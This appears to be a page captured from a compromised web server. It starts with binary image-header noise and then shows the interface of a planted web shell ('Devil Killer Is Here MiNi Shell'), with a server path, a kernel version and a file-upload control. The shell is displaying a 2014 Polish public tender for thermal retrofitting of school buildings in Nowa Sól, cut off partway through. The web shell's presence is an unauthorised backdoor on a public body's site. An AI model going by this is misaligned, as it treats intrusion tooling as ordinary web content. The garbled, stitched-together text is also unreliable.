JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140409/120898-N-2014.html

<p class="kh_header"><b>Nowa Sól: Termomodernizacja budynków Zespołu Szkół Ponadgimnazjalnych nr 2 w Nowej Soli.</b><br>
<b>Numer ogłoszenia: 120898 - 2014; data zamieszczenia: 09.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosolski , ul. Moniuszki 3B, 67-100 Nowa Sól, woj. lubuskie, tel. 68 4586800, faks 68 4586831.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nowosolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków Zespołu Szkół Ponadgimnazjalnych nr 2 w Nowej Soli..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Postępowanie prowadzone dla zamówienia publicznego o wartości szacunkowej poniżej 5.186.000
euro.
Przedmiotem zamówienia jest wykonanie termomodernizacji budynków w ramach zadania pn.:Termomodernizacja budynków Zespołu Szkół Ponadgimnazjalnych nr 2 w Nowej Soli przy ul.
Wrocławskiej 33a.
Zadanie jest realizowane w ramach Lubuskiego Regionalnego Programu Operacyjnego na lata 2007 -
2013, Priorytet III Ochrona i zarządzanie zasobami środowiska przyrodniczego, Działanie 3.2.
Poprawa jakości powietrza, efektywności energetycznej oraz rozwój i wykorzystanie odnawialnych
źródeł energii. Projekt, o którym mowa powyżej został podzielony na dwa niezależne postępowania o
udzielenie zamówienia publicznego obejmujące w swym zakresie :
1) termomodernizację budynków Zespołu Szkół Ponadgimnazjalnych nr 2 (dotyczy niniejszego
zamówienia) ,
oraz
2) montaż pomp ciepła wraz z modernizacją części c.o.,c.w.u. (budynek internatu) w formule :
zaprojektuj i wybuduj.
W skład Zespołu Szkół Ponadgimnazjalnych nr 2 wchodzą budynki:
a) internat, którego termomodernizacja nie wchodzi w skład niniejszego zamówienia (wykonana w
w 2009r.);
b) łącznik ;
c) warsztaty szkolne;
d) budynek administracyjny;
e) budynek dydaktyczny A i B wraz z przybudówką.
Wyszczególnienie robót termomodernizacyjnych m.in.:
a) ocieplenie ścian zewnętrznych,
b) ocieplenie stropodachów,
c) wymiana części starych okien drewnianych ,
d) wymiana drzwi zewnętrznych drewnianych .
Wyszczególnienie robót dodatkowych m.in.:
a) rozbiórka i wymiana pokrycia dachów;
b) likwidacja daszków nad drzwiami wejściowymi,
c) montaż nowych daszków,
d) wymiana obróbek blacharskich,
e) wymiana rynien i rur spustowych,
f) wykonanie pomiarów instalacji odgromowej po zakończeniu robót.
Wyszczególnienie robót budowlanych na terenie m.in.:
a) demontaż opaski wokół budynków,
b) założenie nowej opaski,
c) rozebranie starego chodnika,
d) ułożenie nowego chodnika z kostki betonowej.
Zamawiający w celach doprecyzowania przedmiotu zamówienia dołączył do SIWZ:
a) kosztorysy;
b) projekt budowlany, opis techniczny, plan zagospodarowania;
c) Specyfikacja Techniczna Wykonania i Odbioru Robót;
d) rysunki - uaktualnione;
e) Formularz istotnych postanowień umowy.
Uwaga:
Ilości składowe robót w kosztorysach - stanowią element pomocniczy przy wycenie. Załączone przez
Zamawiającego kosztorysy mają charakter informacyjny i pomocniczy do kalkulacji kosztów.
Zamawiający zaleca, aby każdy Wykonawca na własny koszt dokonał wizji lokalnej celem sprawdzenia i
zapoznania się z przyszłym terenem budowy, z warunkami związanymi z wykonywaniem robót
budowlanych oraz uzyskaniem informacji koniecznych do oceny i wyceny wszystkich robót i czynności
niezbędnych do prawidłowej realizacji niniejszego zamówienia.
Równoważność
1) Ewentualne nazwy własne znajdujące się w SIWZ bądź innym integralnym do SIWZ dokumencie
zostały przywołane przykładowo i nie mogą być traktowane jako rekomendacja ich nabycia, użycia, czy
promocji.
2) Zamawiający dopuszcza składanie ofert równoważnych. Wskazane w SIWZ bądź innym integralnym
do SIWZ dokumencie materiały, wyroby, systemy, urządzenia Zamawiający traktuje jako określenie
wymaganych minimalnych parametrów użytkowych, funkcjonalnych, technicznych lub standardów
jakościowych .
3) Ciężar udowodnienia, że produkt jest równoważny w stosunku do wymogu określonego przez
Zamawiającego spoczywa na Wykonawcy (art.39 ust.5 ustawy pzp).
4) Wykonawca, który powołuje się na rozwiązania równoważne jest obowiązany na każde żądanie
Zamawiającego wykazać, że zaoferowane przez niego produkty są nie gorsze od produktów
wymaganych przez Zamawiającego. W przypadku oferowania rozwiązań równoważnych w stosunku do
rozwiązań określonych w dokumentacji projektowej i SIWZ, Wykonawca zobowiązany jest do
przedstawienia dokumentów potwierdzających ich równoważność takich jak: parametry techniczne,
jakościowe, eksploatacyjne, funkcjonalność, certyfikaty, aprobaty techniczne z podaniem nazwy
podmiotu wydającego oraz terminu ważności dokumentu.
5) Zaoferowanie wyrobów lub materiałów równoważnych nie może prowadzić do zmiany projektu.
Wymagania jakościowe
Wszystkie materiały użyte do wykonania zamówienia muszą posiadać dopuszczenie do stosowania w
budownictwie oraz być pierwszego gatunku. Dokumentami dopuszczającymi do stosowania w
budownictwie są :
a) certyfikat zgodności z Polską ( Europejską ) Normą,
b) deklaracja zgodności z Polską ( Europejską ) Aprobatą Techniczną,
c) aprobatą techniczną, w przypadku wyrobów, dla których nie ustanowiono Polskiej Normy, jeżeli nie są
objęte certyfikacją określoną w ww. punkcie.
W przypadku gdy dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót nie
podają w sposób szczegółowy technologii wykonywania robót lub wykonania określonego elementu
przedmiotu zamówienia, bądź też nie precyzują dostatecznie rodzaju i standardu materiałów,
Wykonawca zobowiązany jest do każdorazowego wcześniejszego uzyskania decyzji w tym zakresie od
Zamawiającego.
Wykonawca jest odpowiedzialny za jakość wykonywanych robót, za zgodność wykonania z Prawem
budowlanym i obowiązującymi w tym zakresie przepisami, uzgodnieniami i warunkami zawartymi w
dokumentacji projektowej, zawartą z Zamawiającym umową, uzgodnieniami z Zamawiającym
dokonanymi w trakcie realizacji przedmiotu zamówienia, zaleceniami nadzoru inwestorskiego,
obowiązującymi normami i warunkami technicznymi wykonania i odbioru robót oraz sztuką budowlaną.
Kolorystyka elewacji budynku bezwzględnie do uzgodnienia z Zamawiającym.
Zapis w projekcie o systemie i tynku oznacza:
- brak możliwości łączenia elementów różnych systemów dociepleń w całość
oraz
- wymóg spełniania przez oferowany system parametrów i właściwości tynku, które zostały opisane
w projekcie.
W przypadku utraty uzyskanego dofinansowania przez Zamawiającego z winy Wykonawcy jest On
zobowiązany do pokrycia w pełnej wysokości należnego dofinansowania, co przyjmuje do wiadomości i
akceptuje.
Wykonawca jest zobowiązany do udzielenia 60 miesięcznej gwarancji jakości na przedmiot
zamówienia. Okres rękojmi zostaje przedłużony na okres udzielonej gwarancji jakości..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.11.30-4, 45.26.12.00-6, 45.32.10.00-3, 45.44.30.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Zamawiający żąda od Wykonawców wniesienie wadium w kwocie 12.000,00 PLN (słownie:
dwanaście tysięcy złotych 00/100), które winno być wniesione przed upływem terminu składania
ofert.
2) Wadium może być wniesione w jednej lub w kilku następujących formach:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z
tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z 9
listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. nr
42, poz.275 z późn. zm.)
Uwaga:
W przypadku składania przez Wykonawcę wadium w formie gwarancji, powinna być ona sporządzona
zgodnie z obowiązującym prawem i powinna zawierać następujące elementy:
a) nazwa dającego zlecenie udzielenia gwarancji (wykonawcy), beneficjenta gwarancji
(zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz
wskazania ich siedzib;
b) określenie wierzytelności, która ma być zabezpieczona gwarancją;
c) kwotę gwarancji;
d) termin ważności gwarancji; wymagana ważność wadium w formach innych niż pieniężna
minimum 30 dni od daty składania ofert;
e) zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie
Zamawiającego w przypadkach określonych w art.46 ust.4a i 5 ustawy pzp i być bezwarunkowe,
nieodwołalne i płatne na pierwsze pisemne żądanie Zamawiającego.
3) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego
BGŻ o/Nowa Sól nr 89 2030 0045 1110 0000 0028 4750 z dopiskiem :przetarg -
termomodernizacja ZSP nr 2 w Nowej Soli .
4) W przypadku wnoszenia wadium w formie pieniężnej do oferty należy załączyć kopię przelewu
wadium na rachunek bankowy Zamawiającego potwierdzoną za zgodność z oryginałem przez
Wykonawcę.
5) Wniesienie wadium w innej, niż wskazanej w pkt 2) formie będzie skutkować uznaniem iż oferta
Wykonawcy nie jest właściwie zabezpieczona wadium, a Zamawiający będzie musiał wykluczyć
takiego Wykonawcę z postępowania na podstawie art. 24 ust.2 pkt 2 ustawy pzp.
6) Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym, które zwraca
wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew
pieniędzy na rachunek bankowy wskazany przez wykonawcę.
7) Termin wniesienia wadium w formie gotówki :
a) za termin wniesienia wadium uznaje się datę wpływu na rachunek Zamawiającego;
b) wadium pieniężne musi być zaksięgowane najpóźniej przed upływem terminu składania ofert,
dlatego Wykonawca musi uwzględnić czas, aby wymagana kwota zdążyła wpłynąć na konto
Zamawiającego (została zaksięgowana w banku na rzecz Zamawiającego).
8) W przypadku wniesienia przez Wykonawcę wadium w formie określonej w pkt.2.b) do pkt 2.e)
zobowiązany jest on załączyć oryginał właściwego dokumentu poręczenia lub gwarancji do złożonej
oferty.
9) Zgodnie z art. 24 ust. 2 pkt 2) Wykonawcę, który nie wniósł wadium w wyznaczonym terminie
wyklucza się z postępowania.
10) Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium
na podstawie art.46 ust.1 ustawy Pzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została
wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez
Zamawiającego.
11) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie,
o którym mowa w art. 26 ust. 3 ustawy pzp, nie złożył dokumentów lub oświadczeń, o których
mowa w art. 25 ust. 1 ustawy pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn
nie leżących po jego stronie;
12) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca , którego oferta została
wybrana:
a) odmówił podpisania umowy na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących
po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie.
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu w tym zakresie na
podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek ten za spełniony, jeżeli wykonawca wykaże, że posiada doświadczenie
wyrażające się tym, że w okresie ostatnich pięciu lat przed upływem składania ofert, a jeżeli okres
prowadzenia działalności jest krótszy - to w tym okresie, wykonał w sposób należyty co najmniej
jedno zamówienie polegające na termomodernizacji budynków, w zakres której wchodziło w
szczególności: ocieplenie ścian zewnętrznych, wymiana stolarki, ocieplenie stropodachów o wartości
nie mniejszej niż 700.000,00 PLN brutto.
Jeżeli wykonawca będzie wykazywał spełnienie warunków przy pomocy dokumentów zawierających
wartości przedstawione w walutach obcych, zamawiający będzie przeliczał waluty obce na złote
(PLN) wg średniego kursu Narodowego Banku Polskiego danej waluty z dnia publikacji ogłoszenia o
przedmiotowym zamówieniu na stronie internetowej zamawiającego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek ten za spełniony, jeżeli wykonawca wykaże, że dysponuje osobą, która
będzie pełnić funkcję kierownika budowy posiadającą:
a) ważne uprawnienia do wykonywania samodzielnych funkcji w budownictwie w specjalności
konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia
budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
upoważniające do kierowania robotami konstrukcyjno - budowlanymi
b) co najmniej 5-letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy/lub
kierownika robót/ lub inspektora nadzoru.
Uwaga:
. Ww. osoba powinny posiadać aktualne zaświadczenie o przynależności do odpowiedniej izby
samorządu zawodowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek ten za spełniony, jeżeli wykonawca wykaże, że :
a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
gospodarczej na kwotę nie mniejszą niż 600.000,00 PLN;
b) posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 700.000,00 PLN,
Jeżeli wykonawca będzie wykazywał spełnienie warunków przy pomocy dokumentów zawierających
wartości przedstawione w walutach obcych, zamawiający będzie przeliczał waluty obce na złote
(PLN) wg średniego kursu Narodowego Banku Polskiego danej waluty z dnia publikacji ogłoszenia o
przedmiotowym zamówieniu na stronie internetowej zamawiającego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>należy wykazać co najmniej jedno zamówienie polegające na termomodernizacji budynków, w zakres
której wchodziło w szczególności: ocieplenie ścian zewnętrznych, wymiana stolarki, ocieplenie
stropodachów o wartości nie mniejszej niż 700.000,00 PLN brutto. Do wykazu należy dołączyć
dowody określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały
wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Dokumenty wymagane w ofercie:
1) wypełniony Formularz oferty - sporządzony wg wzoru załącznik nr 1 do SIWZ;
2) oświadczenie Wykonawcy o spełnieniu warunków udziału określonych w art.22 ust.1 - sporządzony
wg wzoru załącznik nr 2 do SIWZ;
3) oświadczenie Wykonawcy o braku podstaw do wykluczenia na podstawie art.24 ust.1 i 2 -
sporządzony wg wzoru załącznik nr 3 do SIWZ;
4) informacja o przynależności do grupy kapitałowej - sporządzony wg wzoru załącznik nr 4 do SIWZ;
5) pełnomocnictwo do złożenia oferty - w przypadku, gdy umocowanie prawne do reprezentacji
wykonawcy nie wynika z przepisów prawa lub z dokumentów rejestrowych złożonych wraz z ofertą.
Pełnomocnictwo należy złożyć w oryginale lub notarialnie poświadczonej kopii;
6) dowód wniesienia / wpłacenia wadium;
